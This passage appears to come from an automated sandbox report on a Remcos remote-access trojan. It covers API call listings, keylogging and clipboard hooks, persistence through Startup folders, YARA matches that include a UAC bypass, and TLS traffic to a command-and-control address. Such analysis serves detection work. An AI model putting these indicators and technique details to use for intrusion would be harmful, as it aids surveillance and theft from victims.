                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CDC9C7
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDC93C FindFirstFileW,FindClose,0_2_00CDC93C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CDF200
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CDF35D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDF65E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CD3A2B
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CD3D4E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDBF27
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00084696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00084696
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008C93C FindFirstFileW,FindClose,2_2_0008C93C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0008C9C7
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F200
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F35D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008F65E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00083A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083A2B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00083D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083D4E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008BF27
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407877 FindFirstFileW,FindNextFileW,5_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0044E8F9 FindFirstFileExA,5_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00407CD2
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\

                  Networking

                  Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49704 -> 45.95.169.104:2404
                  Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49721 -> 45.95.169.104:2404
                  Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49722 -> 45.95.169.104:2404
                  Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 45.95.169.104 2404
                  Source: Malware configuration extractor URLs: 5.95.169.104
                  Source: global traffic TCP traffic: 192.168.2.5:49704 -> 45.95.169.104:2404
                  Source: Joe Sandbox View ASN Name: GIGANET-HUGigaNetInternetServiceProviderCoHU GIGANET-HUGigaNetInternetServiceProviderCoHU
                  Source: unknown TCP traffic detected without corresponding DNS query: 45.95.169.104
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CE25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CE25E2
                  Source: svchost.exe String found in binary or memory: http://geoplugin.net/json.gp
                  Source: name.exe, 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: Amcache.hve.8.dr String found in binary or memory: http://upx.sf.net

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000,5_2_0040A2F3
                  Source: C:\Windows\SysWOW64\svchost.exe Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\svchost.exe
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00CE425A
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CE4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CE4458
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00094458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00094458
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004168FC
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004168FC
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CD0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00CD0219
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CFCDAC
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000ACDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_000ACDAC
                  Source: Yara match File source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match File source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR
                  Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0041CA73 SystemParametersInfoW,5_2_0041CA73
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0041CA73 SystemParametersInfoW,12_2_0041CA73

                  System Summary

                  Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: This is a third-party compiled AutoIt script. 0_2_00C73B4C
                  Source: jv4ri.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: jv4ri.exe, 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c0dda5a9-9
                  Source: jv4ri.exe, 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_d83c89d0-f
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: This is a third-party compiled AutoIt script. 2_2_00023B4C
                  Source: name.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: name.exe, 00000002.00000002.2039583863.00000000000D5000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_fa566f94-4
                  Source: name.exe, 00000002.00000002.2039583863.00000000000D5000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_86ebd91a-8
                  Source: name.exe, 00000004.00000002.2054778566.00000000000D5000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_303ad09c-e
